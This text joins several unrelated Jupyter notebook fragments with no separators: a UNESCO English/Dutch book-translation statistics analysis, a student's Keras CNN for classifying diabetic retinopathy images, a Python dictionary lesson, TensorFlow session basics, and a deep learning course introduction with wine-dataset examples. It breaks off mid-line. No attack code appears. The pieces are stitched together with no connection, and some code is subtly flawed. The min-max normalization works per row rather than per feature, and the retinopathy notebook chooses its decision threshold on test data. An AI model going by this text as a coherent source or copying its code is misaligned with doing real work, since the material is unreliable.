Notice that languages which account for less than 2.5% of the total translations have been aggregated together as 'others'.pct = 0.025 data_en_pie = data_en[data_en>0] data_en_pie = data_en_pie / data_en_pie.sum() data_en_pie.sort() fracs = data_en_pie[data_en_pie>pct].values.tolist() labels = data_en_pie[data_en_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=270, colors=cs) title('Languages English books\nare translated to\n') axis('equal');Translations into EnglishConversely, we examine the number of books which get translated from other languages into English. The following table indicates the total number of translations into English and from how many languages these translations occur.data_2_en = data.transpose()['English'] total_2_en = '{:,.0f}'.format(data_2_en.sum()) langs_2_en = '{:,.0f}'.format(len(data_2_en[data_2_en>0])) table = []; table.append(['English' , '' ]) table.append(['Total files', total_2_en ]) table.append(['Translated from languages' , langs_2_en]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart indicates the percentage of translations from other languages into English. Notice that Dutch features in the top 10 languages translated into English.pct = 0.015 data_en_pie = data_2_en[data_2_en>0] data_en_pie = data_en_pie / data_en_pie.sum() data_en_pie.sort() fracs = data_en_pie[data_en_pie>pct].values.tolist() labels = data_en_pie[data_en_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=180, colors=cs) title('Languages from which books\nare translated into English\n') axis('equal');Translations from DutchNext, we examine the total number of books originally written in Dutch and which have been translated into another language. The table below also indicates the total number of languages into which Dutch books have been translated.data_nl = data['Dutch'] total_nl = '{:,.0f}'.format(data_nl.sum()) langs_nl = '{:,.0f}'.format(len(data_nl[data_nl>0])) table = []; table.append(['Dutch' , '' ]) table.append(['Total files', total_nl ]) table.append(['Translated to languages' , langs_nl]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart illustrates the percentage of books translated from Dutch into other languages. Notice that languages which account for less than 1.5% of the total translations have been aggregated together as 'others'.pct = 0.015 data_nl_pie = data_nl[data_nl>0] data_nl_pie = data_nl_pie / data_nl_pie.sum() data_nl_pie.sort() fracs = data_nl_pie[data_nl_pie>pct].values.tolist() labels = data_nl_pie[data_nl_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=270, colors=cs) title('Languages Dutch books\nare translated to\n') # title('Translated from Dutch\n') axis('equal'); # savefig('/home/carlosm/Projects/BeyondTheBook/DH 2015/fig2.svg');Translations into DutchConversely, we examine the number of books which get translated from other languages into Dutch.
The following table indicates the total number of translations into Dutch and from how many languages these translations occurr.data_2_nl = data.transpose()['Dutch'] total_2_nl = '{:,.0f}'.format(data_2_nl.sum()) langs_2_nl = '{:,.0f}'.format(len(data_2_nl[data_2_nl>0])) table = []; table.append(['Dutch' , '' ]) table.append(['Total files', total_2_nl ]) table.append(['Translated from languages' , langs_2_nl ]) pytbl.make_table(table) pytbl.set_cell_style(0,0, bold=True, column_span=2, color='gray') pytbl.set_column_style(1, align='right')The following chart illustrates the percentage of translations from other languages into Dutch. Notice that English represents by far the majority of books which get translated into Dutch.pct = 0.005 data_nl_pie = data_2_nl[data_2_nl>0] data_nl_pie = data_nl_pie / data_nl_pie.sum() data_nl_pie.sort() fracs = data_nl_pie[data_nl_pie>pct].values.tolist() labels = data_nl_pie[data_nl_pie>pct].index.tolist() fracs.append(1 - sum(fracs)) labels.append('Other') cs = cm.Set1(np.arange(len(labels))/len(labels)) pie(fracs, labels=labels, autopct='%1.1f%%', shadow=True, startangle=180, colors=cs) title('Languages from which books\nare translated into Dutch\n') axis('equal'); # savefig('/home/carlosm/Projects/BeyondTheBook/DH 2015/fig2b.svg')Between English and DutchAnd the following table indicates the number of books which have been published from English to Dutch and conversely from Dutch to English.nl_en = '{:,.0f}'.format(data['Dutch']['English']) en_nl = '{:,.0f}'.format(data['English']['Dutch']) table = []; table.append(['' , '' , 'To', '']) table.append(['' , '' , 'English', 'Dutch' ]) table.append(['From', 'English', '' , en_nl ]) table.append(['' , 'Dutch' , nl_en , '' ]) pytbl.make_table(table) pytbl.set_cell_style(2,0, row_span=2, bold=True, color='gray') pytbl.set_cell_style(0,2, column_span=2, bold=True, color='gray') pytbl.set_cell_style(1,2, color='lightgray') pytbl.set_cell_style(1,3, color='lightgray') pytbl.set_cell_style(2,1, color='lightgray') pytbl.set_cell_style(3,1, color='lightgray') data_t = pd.read_csv('unesco_xtrans_stats_years.csv', sep='\t', index_col=0) data_t = data_t.fillna(0)Publications over timeThe following graph indicates the number of books translated per year in Dutch and in English. Notice that because the volumes of books are significantly different, data has been plotted with two different axes.ax = data_t['English'].plot(color='b', label='English') legend(loc='upper left') ax.set_ylabel('# books') ax.set_xlabel('Year of publication') twinx() ax = data_t['Dutch'].plot(color='r', label='Dutch') legend(loc='upper right') ax.set_ylabel('# books') title('English and Dutch books\npublished per year'); data_tt = pd.read_csv('unesco_xtrans_stats_trans_years.csv', sep='\t', skiprows=1) data_tt['Target Language'] = data_tt['Target Language'].fillna('') del data_tt['Unnamed: 36'] data_tt['langs'] = data_tt.apply(lambda x: x['Original language'] + ' - ' + x['Target Language'], axis=1) del data_tt['Original language'] del data_tt['Target Language'] data_tt = data_tt.fillna(0) data_tt = data_tt.set_index('langs') data_tt = data_tt.transpose()Translations over timeThe following graph indicates the number of books which have been translated from Dutch to English and from English to Dutch over the years. 
Again, notice that the plot has been drawn with two axes.ax = data_tt['English - Dutch'].plot(color='b', label='EN -> NL') legend(loc='upper left') ax.set_ylabel('# books') ax.set_xlabel('Year of publication') twinx() ax = data_tt['Dutch - English'].plot(color='r', label='NL -> EN') legend() ax.set_ylabel('# books') legend(loc='upper right') title('English - Dutch book \ntranslations per year');The following graphs illustrate the volume of books that have been translated over the years into and from English / Dutch.from_lang = 'English' to_lang = 'Dutch' cols = [ col for col in data_tt.columns if col.startswith(from_lang + ' - ')] data_tt[cols].transpose().sum().plot(label='EN -> *') data_tt[from_lang + ' - ' + to_lang].plot(label='EN -> NL') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from English \ninto other languages'); from_lang = 'Dutch' to_lang = 'English' cols = [ col for col in data_tt.columns if col.startswith(from_lang + ' - ')] data_tt[cols].transpose().sum().plot(label='NL -> *') data_tt[from_lang + ' - ' + to_lang].plot(label='NL -> EN') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from Dutch \ninto other languages'); from_lang = 'Dutch' to_lang = 'English' cols = [ col for col in data_tt.columns if col.endswith(' - ' + to_lang)] data_tt[cols].transpose().sum().plot(label='* -> EN') data_tt[from_lang + ' - ' + to_lang].plot(label='NL -> EN') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from other languages \ninto English'); from_lang = 'English' to_lang = 'Dutch' cols = [ col for col in data_tt.columns if col.endswith(' - ' + to_lang)] data_tt[cols].transpose().sum().plot(label='* -> NL') data_tt[from_lang + ' - ' + to_lang].plot(label='EN -> NL') legend(loc=0) xlabel('Year of publication') ylabel('# books') title('Books translated from other languages \ninto Dutch'); data_t[data_t.index<2008].sum(axis=1).plot() xlabel('Year of publication') ylabel('Global book translations') ax = axis() axis([ ax[0], ax[1], 0, ax[3] ]) # title('Global translations over time'); savefig('GlobalTranslations.pdf')Week 4. Case 2Last edited: 25.2.2018Cognitive Systems for Health Technology ApplicationsHelsinki Metropolia University of Applied Sciences 1. ObjectivesThe aim of this Case 2 is to learn to use convolutional neural networks to classify medical images. I downloaded a data file full of diabetic retinopathy images, thousands and thousands of images, with three different folders for training, testing and validation and two different types of images: non-symptom and symptom. First I import all the libraries that I need, then I build the neural network, process the data and so on. All of that is found below in this notebook file. Note (25.2)Okay, now I take a little risk here. I'm not happy with the last result that I got from training last time; the result was only 0.73. I made some small changes and now I run everything one more time. It is 6:32pm right now and the deadline is under 3 hours from now. So let's see what happens and how much time this takes. - Kimmo
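A minimal sketch of the folder layout this notebook relies on, assuming the data has been unpacked under ..\..\dataset2 as in the paths used later; the class subfolder names depend on how the download was extracted, so they are only listed here, not assumed. Keras' flow_from_directory (used below) builds the binary labels from exactly these per-class subfolders.

import os

base = os.path.join("..", "..", "dataset2")   # same base path as the train/validation/test dirs below
for split in ("train", "validation", "test"):
    split_dir = os.path.join(base, split)
    if os.path.isdir(split_dir):
        # flow_from_directory expects one subfolder per class inside each split folder
        print(split, "->", sorted(os.listdir(split_dir)))
    else:
        print(split, "-> folder not found")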
2. Import libraries# Code, model and history filenames my_code = 'gpu_template.py' model_filename = 'case_2_model.h5' history_filename = 'case_2_history.p' # Info for the operator import time print('----------------------------------------------------------------------') print(' ') print('Starting the code (', time.asctime(), '):', my_code) print(' ') import numpy as np import matplotlib.pyplot as plt import keras from keras import layers from keras import models import pickle from keras.preprocessing.image import ImageDataGenerator from keras import optimizers import os %matplotlib inline3. Building network This chapter is where the model gets built. I set the batch sizes and the number of epochs already here, including values used by the data processing later in this code. Adding the layers happens here too. I tried VGG16 here, but it gave only 0.70 accuracy on the test data, so I decided to drop it.# Training parameters batch_size = 40 epochs = 20 steps_per_epoch = 20 validation_steps = 20 image_height = 150 image_width = 150 # Build the model model = models.Sequential() model.add(layers.Conv2D(64, (3, 3), activation = 'relu', input_shape = (image_height, image_width, 3))) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation = 'relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation = 'relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Flatten()) model.add(layers.Dense(138, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary() model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4), metrics=['acc'])4. Data preprocessing# Dataset directories and label files train_dir = "..\\..\\dataset2\\train" validation_dir = "..\\..\\dataset2\\validation" test_dir = "..\\..\\dataset2\\test" # All images will be rescaled by 1./255 train_datagen = ImageDataGenerator(rescale=1./255) test_datagen = ImageDataGenerator(rescale=1./255) train_generator = train_datagen.flow_from_directory( # This is the target directory train_dir, # All images will be resized to 150x150 target_size=(150, 150), batch_size=20, # Since we use binary_crossentropy loss, we need binary labels class_mode='binary') validation_generator = test_datagen.flow_from_directory( validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary') # Create data generators for training, validation and testing # Note: train_generator above was already built from the plain rescaling datagen, so the augmentation (zoom, flip) defined here is only used if the generators are rebuilt train_datagen = ImageDataGenerator(rescale = 1./255, zoom_range = 0.2, horizontal_flip = True) validation_datagen = ImageDataGenerator(rescale = 1./255) test_datagen = ImageDataGenerator(rescale = 1./255) # shapes for data_batch, labels_batch in train_generator: print('data batch shape:', data_batch.shape) print('labels batch shape:', labels_batch.shape) break # Generator for validation dataset print('Validation dataset.') validation_generator = validation_datagen.flow_from_directory( validation_dir, target_size = (image_height, image_width), batch_size = batch_size, class_mode = 'binary') labels_batch5. Modeling# Compile the model model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(), metrics=['acc']) # This saves a model file to my folder for the next training run model.save('case_2_run_1.h5') # Model training; also show how much time it takes... and sometimes it takes a lot...
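# A rough sketch of the arithmetic implied by the settings above: train_generator yields batches of
# 20 images, so steps_per_epoch = 20 means roughly 20 * 20 = 400 training images per epoch, and the
# validation generator uses batch_size = 40, so validation_steps = 20 covers about 800 validation images.
# (These are just the values set earlier in this notebook, restated for orientation.)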
t1 = time.time() h = model.fit_generator( train_generator, steps_per_epoch = steps_per_epoch, verbose = 1, epochs = epochs, validation_data = validation_generator, validation_steps = validation_steps) t2 = time.time() # Store the elapsed time into history h.history.update({'time_elapsed': t2 - t1}) print(' ') print('Total elapsed time for training: {:.3f} minutes'.format((t2-t1)/60)) print(' ') test_generator = test_datagen.flow_from_directory( test_dir, target_size=(150, 150), batch_size=20, class_mode='binary') test_loss, test_acc = model.evaluate_generator(test_generator, steps = 21) # Test accuracy print('test_acc:', test_acc)Found 413 images belonging to 2 classes. test_acc: 0.7917675524596. Results I trained that model many times and I did not get over 0.80 overall. I switched the number of epochs, batch sizes, picture sizes, layer sizes and many other things. Sometimes training took over an hour on my laptop. One time my laptop even crashed, maybe from overheating or from something else, but right after training completed I put the laptop aside from the table and it crashed. I trained these results on Sunday evening and decided to leave it here. I made small additions to the results when I went through some PowerPoints from Oma, copied them and added them to this notebook. Compiled explanations can be found below in the "Conclusions" section.import matplotlib.pyplot as plt acc = h.history['acc'] val_acc = h.history['val_acc'] loss = h.history['loss'] val_loss = h.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # Predict the Score y_true = np.zeros(413) y_score = np.zeros(413) sample_count = 413 i = 0 for inputs_batch, labels_batch in test_generator: predicts_batch = model.predict(inputs_batch) L = labels_batch.shape[0] index = range(i, i + L) y_true[index] = labels_batch.ravel() y_score[index] = predicts_batch.ravel() i = i + L if i >= sample_count: break from sklearn.metrics import roc_curve, roc_auc_score fpr, tpr, thresholds = roc_curve(y_true, y_score) auc = roc_auc_score(y_true, y_score) plt.figure() plt.plot(fpr, tpr) plt.plot([0, 1], [0, 1], '--') plt.grid() plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.title('ROC curve AUC = {:.3f}'.format(auc)) plt.show() plt.figure() plt.plot(thresholds, 1-fpr, label = 'specificity') plt.plot(thresholds, tpr, label = 'sensitivity') plt.legend() plt.grid() plt.xlabel('Threshold value') plt.show() # Import more libraries from sklearn.
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix from sklearn.metrics import classification_report, recall_score from sklearn.metrics import precision_recall_curve from sklearn.metrics import average_precision_score # Select the threshold to maximize both specificity and sensitivity th = 0.3 acc = accuracy_score(y_true, y_score > th) prec = precision_score(y_true, y_score > th) f1 = f1_score(y_true, y_score > th) recall = recall_score(y_true, y_score > th) print('Accuracy: {:.3f}'.format(acc)) print('Precision: {:.3f}'.format(prec)) print('Recall: {:.3f}'.format(recall)) print('F1: {:.3f}'.format(f1)) print('Classification report') print(classification_report(y_true, y_score > th, labels = [1.0, 0.0], target_names = ['Disease', 'Healthy'])) tn, fp, fn, tp = confusion_matrix(y_true, y_score > th).ravel() print(' Confusion matrix') print(' True condition') print(' Positive Negative Sum') print('Predicted | Positive {:8} {:8} {:8}'.format(tp, fp, tp + fp)) print('condition | Negative {:8} {:8} {:8}'.format(fn, tn, fn + tn)) print(' Sum {:8} {:8} {:8}'.format(tp + fn, fp + tn, tp + fp + fn + tn)) print(' ') print('Sensitivity: {:.3f}'.format(tp/(tp+fn))) print('Specificity: {:.3f}'.format(tn/(tn+fp)))Confusion matrix True condition Positive Negative Sum Predicted | Positive 109 107 216 condition | Negative 10 187 197 Sum 119 294 413 Sensitivity: 0.916 Specificity: 0.636Looping Through DictionariesDictionaries are so important in Python you _need_ to know how to loop over them. But they aren't regular sequences, they don't have an index number. Instead of an index number they use names, and we won't always know the names in a dictionary. So looping is a bit different for dictionaries than it is for lists, tuples, sets or strings.person = { 'name': 'Kalob', 'course': 'Python for Everybody', 'role': 'Teacher', } person for key in person: value = person[key] print(key, value)name Kalob course Python for Everybody role Teacher> **Note**: A regular `for` loop on a dictionary just prints the keys. That's not super helpful if we want key/value pairs without creating our own variables. Using `.item()`'s to create key/value pairs in a tupleperson.items() for key, value in person.items(): print(f"Key: {key} \t\t Value: {value}")Key: name Value: Kalob Key: course Value: Python for Everybody Key: role Value: TeacherSessionSession is a class for running TensorFlow operations. A session encapsulates the control and state of the TensorFlow runtime.import tensorflow as tf # create a graph a = tf.constant(1) # 1 with tf.Session() as session: print(session.run(a)) # 2 session = tf.Session() print(session.run(a)) session.close() # 3 Interactive session, usefull in shells tf.InteractiveSession() print(a.eval())1 1 1Constantsa = tf.constant([[1, 2, 3], [4, 5, 6]], dtype=tf.float32, name='constant') with tf.Session() as session: print(session.run(a)) print("shape: ", a.get_shape(), ",type: ", type(a.get_shape()))[[ 1. 2. 3.] [ 4. 5. 
6.]] shape: (2, 3) ,type: Variablesvar = tf.Variable(tf.random_normal([3], stddev=0.1), name='var') with tf.Session() as session: # must initialize before usage init = tf.variables_initializer([var]) session.run(init) # or initialize all vars init = tf.global_variables_initializer() session.run(init) print(session.run(var))[ 0.03565044 0.0211431 0.07576992]Placeholderx = tf.placeholder(tf.int32) y = tf.placeholder(tf.int32) add = tf.add(x, y) add = x + y with tf.Session() as session: result = session.run(add, feed_dict={x: 1, y: 2}) print("1 + 2 = {0}".format(result))1 + 2 = 31.1 Machine Learning 1.1.1 The place of deep learning and neural networks in AIThere are many different definitions, but most of them are tied to human-machine interaction: these are algorithms or methods that either imitate human behavior or allow a machine to behave similarly to humans (that is, to exhibit some intelligent behavior). The field of AI has never been limited to machine learning, which consists of learning from examples. AI includes a whole range of other approaches, for example multi-agent systems or knowledge bases, in which people create links between different concepts.**Artificial intelligence (AI)** ~= the area of IT/computer science concerned with modeling intellectual or creative kinds of human activity.**Machine learning (ML)** - the subfield of AI concerned with learning from data; it is not the only one, since knowledge bases and multi-agent systems, for example, are also considered branches of AI. **Deep learning (DL)** ~= a multi-layer neural network (MLP = multi-layer perceptron)Here, however, we consider the narrower area related to ML. Models that have several layers are called deep, or neural-network, models. If we take a single layer of such a model (for example a linear classifier, i.e. a perceptron), it stops being a deep model, although it is in fact the simplest neural network. 1.1.2 Application areas of DLRecently it is exactly this kind of model that has shown high effectiveness in areas where human ability seemed dominant: in particular computer vision (CV), natural language processing (NLP: extracting meaning, machine translation) and speech recognition. Within this course we will look at how this field can be applied to practical problems and at the models that solve them. We will also get acquainted with the results of the most recent research on the topic. In this course we will examine in detail the DL technologies used in these areas. 1.1.3 The connection of DL with scienceBesides applied problems there is also scientific research, whose results are to a certain extent unpredictable. It cannot be ruled out that they will appear in areas where DL technologies have not been actively used so far. Supporting this kind of research is the main goal of our course. Alternative wording: we see that neural networks have already found application in a multitude of common (routine) tasks that surround us. However, every scientific work is individual, and that is the difficulty: only the author understands how the data in their subject area is processed and how the result should be evaluated. Yet scientists, especially from the natural sciences or humanities, are not always ready to apply ML to the object of their research on their own. That is why we are here ... 1.2 The history of deep learningIn the image you see the perceptron - essentially the first neural network, which appeared more than half a century ago. It is a single-layer neural network that today would not be classified as a deep learning model. The perceptron consists of three types of elements: **signals** coming from sensors are passed to **associative elements** and then to **responding elements**. In this way the perceptron makes it possible to create a set of "associations" between input stimuli and the required reaction at the output. Biologically this corresponds to transforming, for example, visual information into a physiological response of motor neurons. The essence of the model is quite simple: data arrives at the inputs, each input is assigned a weight, the weighted inputs are summed at the output, and then a (threshold) activation function is applied. A rough analogy is a neuron of the human brain, which works on the same principle. At the time this was a breakthrough and captured great minds; a supercomputer was built that occupied several rooms. However, only a few years later it was proven that the perceptron cannot reproduce a number of simple functions, for example the **xor** function shown in the table. After this discovery interest in neural networks dropped sharply and they fell into oblivion; it was difficult even to publish a paper on the subject.
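A minimal sketch of that idea, assuming nothing beyond numpy: a single-layer perceptron is a weighted sum of the inputs followed by a threshold activation, trained with the classic perceptron learning rule. On the linearly separable AND function it converges, while for xor no straight line separates the two classes, so the accuracy stays below 100%.

import numpy as np

def train_perceptron(X, y, epochs=20, lr=0.1):
    w = np.zeros(X.shape[1])
    b = 0.0
    for _ in range(epochs):
        for xi, target in zip(X, y):
            pred = 1 if xi @ w + b > 0 else 0   # weighted sum + threshold activation
            w += lr * (target - pred) * xi      # adjust the weights when the prediction is wrong
            b += lr * (target - pred)
    return w, b

def accuracy(X, y, w, b):
    return ((X @ w + b > 0).astype(int) == y).mean()

X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
y_and = np.array([0, 0, 0, 1])
y_xor = np.array([0, 1, 1, 0])

w, b = train_perceptron(X, y_and)
print("AND accuracy:", accuracy(X, y_and, w, b))   # reaches 1.0
w, b = train_perceptron(X, y_xor)
print("xor accuracy:", accuracy(X, y_xor, w, b))   # stays below 1.0: xor is not linearly separable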
One of the most important works related to deep learning is the experiment of American biologists at Harvard. In 1959 the reactions of certain regions of a cat's brain to certain simple visual stimuli were studied. As with most discoveries, it came about completely by accident. An electrode was implanted in the cat's brain to determine which picture would trigger a reaction. It is worth remembering, however, that at that time slides were changed with a sliding motion, and it was exactly this motion that produced the reaction: as soon as a slide changed and the edge of the shutter - essentially a simple straight line - moved across the screen, a response was transmitted and recorded. After a series of experiments it turned out that there are cells that react to simple shapes (lines and angles), to motion, and to motion in a particular direction or of a particular shape. Layers of these cells form a kind of hierarchy, and it is exactly this idea that underlies the concept of neural-network methods. 1.2.2 The victory of the AlexNet neural network in the ImageNet competition in 2012 1.2.3 ImageNet: Large Scale Visual Recognition Challenge (ILSVRC) 1.3 Current application areas of DL 1.3.1 RoboticsSelf-driving cars and drones. Industrial and household robots. 1.3.2 SecurityVideo analytics, access control, face and license plate recognition. 1.3.3 Internet and augmented realitySearch, including semantic search. Content analysis, including visual content. Machine translation. Speech recognition. 1.3.4 Medicine- add examples 1.3.5 Applications of DL in scientific research 1.3.7 Reasons for the success of DL-based technologies 1.4 Problems solved with machine learning 1.4.1 Extracting regularitiesA scientist repeatedly observes a process and makes generalizations. The result of such work is a model describing some processes of the real world. ML is a technology that makes it possible to discover regularities in data and generalize them. The result of training such a model is a set of weights - essentially a set of coefficients for some mathematical expression. Newton's laws are not formulated in terms of apples: to describe regularities, science uses abstractions - force, mass, acceleration - with which real objects are described. Data for ML models must also be prepared, and the typical form of such an abstraction is a vector of numbers. The second part of the training process is evaluating the result: the obtained result is compared with a reference and, if the difference is large, the model is adjusted.
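A minimal sketch of that compare-and-correct loop, using made-up data: the "model" is just two coefficients of a linear expression, the prediction is compared with the reference values, and the weights are nudged to reduce the squared difference.

import numpy as np

rng = np.random.default_rng(0)
x = rng.uniform(-1, 1, size=100)
y = 3.0 * x + 0.5 + rng.normal(scale=0.1, size=100)   # reference values (toy data)

w, b = 0.0, 0.0          # the set of weights the model learns
lr = 0.1
for step in range(500):
    pred = w * x + b                   # the model's output
    error = pred - y                   # compare with the reference
    w -= lr * 2 * np.mean(error * x)   # correct the model
    b -= lr * 2 * np.mean(error)

print(w, b)   # ends up close to the coefficients 3.0 and 0.5 used to generate the data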
ExampleWe need to count the number of steps using the readings of the accelerometer built into a pedometer. Option 1Write a program of the form:if x[i] > x[i - k] and y[i] > y[i - k] and ... ....else: ... Option 2Train a modelIn this case you do not need to know anything about the nature of the signals; it is only important to collect a sufficient amount of data and label it. Labeling here means collecting information about how many steps the person actually took. 1.4.3 Basic tasks 1.4.3 Data types 1.4.4 Evaluating the result 1.5 Examples of problems solved with machine learning methodsLet us look at examples of solving classification and linear regression problems on different types of data. We will use the libraries:* numpy* [sklearn](https://scikit-learn.org/stable/) - 'toy' datasets, ML algorithms * [pandas](https://pandas.pydata.org/) - convenient work with tabular dataand get acquainted with the tools:* **Pytorch** * **Tensorboard** 1.5.1 Loading data# Wine classification # We use the sklearn library: https://scikit-learn.org/stable/ import sklearn from sklearn.datasets import load_wine #https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html#sklearn.datasets.load_wine # Load the dataset data = load_wine(return_X_y = True) # The data can also be returned as a Bunch (dictionary) or a pandas DataFrame features = data[0] # 178x13 array: 178 bottles, each with 13 features class_labels = data[1] # Array of 178 elements; each element is a number denoting the class this bottle belongs to: 0, 1, 2 print("Data",features.shape) print("Class labels",class_labels.shape)1.5.2 Visualizing the data# Import the library for working with tabular data: https://pandas.pydata.org/ import pandas as pd data_bunch = load_wine(return_X_y = False) print(data_bunch.keys()) """ If the parameter return_X_y == False the data comes in a Bunch object: https://scikit-learn.org/stable/modules/generated/sklearn.utils.Bunch.html#sklearn.utils.Bunch It is essentially a dictionary. To display the data as a table we convert it to a pandas.DataFrame """ df = pd.DataFrame(data_bunch.data, columns=data_bunch.feature_names) df.head()Each row of the table can be interpreted as a vector of 13 elements, and such a vector can be interpreted as the coordinates of a point in 13-dimensional space. This is exactly the representation most machine learning algorithms work with. A 13-dimensional space cannot be visualized directly :(, but we can visualize a projection of the data into 3-dimensional space. For this we use the projector tool from tensorboardhttps://pytorch.org/tutorials/intermediate/tensorboard_tutorial.html# Helper for launching Tensorboard in Colab # Fix: https://stackoverflow.com/questions/60730544/tensorboard-colab-tensorflow-api-v1-io-gfile-has-no-attribute-get-filesystem import tensorflow as tf import tensorboard as tb tf.io.gfile = tb.compat.tensorflow_stub.io.gfile import os import shutil # Launch Tensorboard in Colab def reinit_tensorboard(clear_log = True): # Log files are read from this directory: logs_base_dir = "runs" if clear_log: # Clear the logs #!rm -rfv {logs_base_dir}/* shutil.rmtree(logs_base_dir, ignore_errors = True) os.makedirs(logs_base_dir, exist_ok=True) # Colab magic %load_ext tensorboard %tensorboard --logdir {logs_base_dir}After Tensorboard loads, change the "Color by" option to "label 3 colors" so that objects belonging to different classes are shown in different colors.
from torch.utils.tensorboard import SummaryWriterimport numpyreinit_tensorboard()writer = SummaryWriter(comment = "wine")np_f = numpy.array(features)writer.add_embedding(np_f, metadata=class_labels )writer.close() A short digression about PCA. Notice that objects of classes 1 and 2 are not linearly separable in 2 dimensions; this is why moving to higher-dimensional spaces is so popular. Note also that the data is centered around zero - this is the result of the normalization Tensorboard applied to it. We will also need to normalize the data. 1.5.3 Data normalization# Let's do it with pytorch import torch from torch.utils.tensorboard import SummaryWriter #reinit_tensorboard() writer = SummaryWriter(comment = "wine") # Plot the values of two features whose values differ by roughly an order of magnitude f_names = data_bunch.feature_names for i, feature in enumerate(features): writer.add_scalars("Raw_2_par",{ f_names[1]:feature[1], # malic_acid f_names[3]:feature[3], # alcalinity_of_ash } ) # Add one more feature whose values differ from the second one by 2 orders of magnitude for i, feature in enumerate(features): writer.add_scalars("Raw_3par",{ f_names[1]:feature[1], # malic_acid f_names[3]:feature[3], # alcalinity_of_ash f_names[12]:feature[12] # proline } ) # Add a histogram for the raw data. writer.add_histogram("1.Raw" , features[:,3]) writer.add_histogram("1.Raw" , features[:,1]) # Convert the data to a torch.Tensor tensor_f = torch.tensor(features) # Min-Max normalization # torch.min and torch.max return tuples (values, indexes) # https://pytorch.org/docs/stable/generated/torch.min.html#torch.min min_values, _ = tensor_f.min(dim=1,keepdim=True) # shape = (178,1) max_values, _ = tensor_f.max(dim=1,keepdim=True) # shape = (178,1) # Subtract the minimum value min_max_centered = tensor_f - min_values # Divide by the range (max - min) min_max_normalized = min_max_centered / (max_values - min_values) writer.add_histogram("2.Min_Max_Centered" , min_max_centered[:,3]) writer.add_histogram("2.Min_Max_Centered" , min_max_centered[:,1]) writer.add_histogram("2.Min_Max_Normalized" , min_max_normalized[:,3]) writer.add_histogram("2.Min_Max_Normalized" , min_max_normalized[:,1]) # Standardization / Z-normalization # Subtract the mean centered = tensor_f - tensor_f.mean(dim=0) # Divide by the standard deviation normalized = centered / tensor_f.std(dim=0) # Add a histogram for the standardized data to Tensorboard writer.add_histogram("3.Centered" , centered[:,3]) writer.add_histogram("3.Centered" , centered[:,1]) writer.add_histogram("3.Normalized" , normalized[:,3]) writer.add_histogram("3.Normalized" , normalized[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , features[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , min_max_normalized[:,1]) writer.add_histogram("4.Mix: raw, MM, Z" , normalized[:,1]) writer.close()
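Written out, the two rescalings above follow the standard formulas (a sketch for reference; because of the dim arguments in the code, the minimum and maximum are taken per row, while the mean and standard deviation are taken per feature column):

$$x'_{\text{min-max}} = \frac{x - x_{\min}}{x_{\max} - x_{\min}}, \qquad x'_{z} = \frac{x - \mu}{\sigma}$$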
1. After Tensorboard loads, choose the "SCALARS" menu item, then set 'Horizontal Axis' = Relative. Values on different scales are not comparable with each other. 2. Choose the "HISTOGRAMS" menu item, then set Offset time axis = WALL or RELATIVE. This clearly shows the advantage of standardization over min-max normalization. 1.5.4 TrainingBase documentationhttps://scikit-learn.org/stable/modules/svm.htmlAn example of using the SVM classifierhttps://www.datacamp.com/community/tutorials/svm-classification-scikit-learn-python# Split data from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(features, class_labels, test_size=0.2) # 80% training and 20% test print("X_train",X_train.shape) print("X_test",X_test.shape)1.5.5 Train the model and compute the accuracyfrom sklearn import svm from sklearn import metrics # Create the model lin_clf = svm.LinearSVC() # Train the model on part of the data lin_clf.fit(X_train, y_train) # Get the predictions y_pred = lin_clf.predict(X_test) print("y_pred",y_pred.shape) print("Accuracy:",metrics.accuracy_score(y_test, y_pred))Other types of data can be handled in the same way. **Loading data.**Pytorch has three libraries for working with different types of data:[torchvision](https://pytorch.org/docs/stable/torchvision/datasets.html)[torchaudio](https://pytorch.org/audio/stable/datasets.html)[torchtext](https://pytorch.org/text/stable/index.html)The classes [Dataset](https://pytorch.org/docs/stable/data.html#torch.utils.data.Dataset) and [Dataloader](https://pytorch.org/docs/stable/data.html#torch.utils.data.DataLoader) are used to load the data. They provide a unified interface for accessing data of different types. An example of loading audio with Pytorch. Install the torchaudio library; it is not in the list of packages available in colab by default.!pip install torchaudioLet's load the datasetSpeech Commands: A Dataset for Limited-Vocabulary Speech Recognitionhttps://arxiv.org/pdf/1804.03209.pdfhttps://pytorch.org/audio/stable/datasets.html#speechcommandsThe data will be unpacked into the sample_data folderimport 